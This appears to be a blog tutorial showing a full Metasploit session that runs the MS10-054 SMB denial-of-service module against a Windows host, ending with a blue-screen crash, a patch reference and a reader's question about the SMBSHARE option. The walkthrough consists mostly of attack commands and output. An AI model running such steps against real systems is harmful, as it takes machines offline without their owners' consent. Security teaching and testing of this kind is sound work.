This is my guide. It is only demo!
Exploit with Metasploit
msf > use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
msf auxiliary(ms10_054_queryfs_pool_overflow) > info
Name: Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
Version: 9983
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Laurent Gaffie
jduck
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.28 yes The target address
RPORT 445 yes The target port
SMBSHARE yes The name of a readable share on the server
Description:
This module exploits a denial of service flaw in the Microsoft
Windows SMB service on versions of Windows prior to the August 2010
Patch Tuesday. To trigger this bug, you must be able to access a
share with at least read privileges. That generally means you will
need authentication. However, if a system has a guest accessible
share, you can trigger it without any authentication.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2550
http://www.osvdb.org/66974
http://www.microsoft.com/technet/security/bulletin/MS10-054.mspx
http://seclists.org/fulldisclosure/2010/Aug/122
msf auxiliary(ms10_054_queryfs_pool_overflow) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The target port
SMBSHARE yes The name of a readable share on the server
msf auxiliary(ms10_054_queryfs_pool_overflow) > set rhost 192.168.10.28
msf auxiliary(ms10_054_queryfs_pool_overflow) > set smbshare Downloads
smbshare => Downloads
msf auxiliary(ms10_054_queryfs_pool_overflow) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.10.28 yes The target address
RPORT 445 yes The target port
SMBSHARE Downloads yes The name of a readable share on the server
msf auxiliary(ms10_054_queryfs_pool_overflow) > exploit
[*] Sending malformed trans2 request..
[*] The target should encounter a blue screen error now.
[*] Auxiliary module execution completed
msf auxiliary(ms10_054_queryfs_pool_overflow) > GAME OVER
Solution :
Microsoft has released a set of patches for Windows XP, Vista, 2008,
7, and 2008 R2 :
Update patch for your windows
http://www.microsoft.com/technet/security/bulletin/ms10-054.mspx
Some info:
http://www.exploit-db.com/exploits/14607/
http://www.nessus.org/plugins/index.php?view=single&id=48291
Thanks!!!
hi,thanks for the guide, but i can't understant the parameter "SMBSHARE", I dont kwon that put in this place... can you help me?
ReplyDeletesorry for my inglish.
saludos amigo!!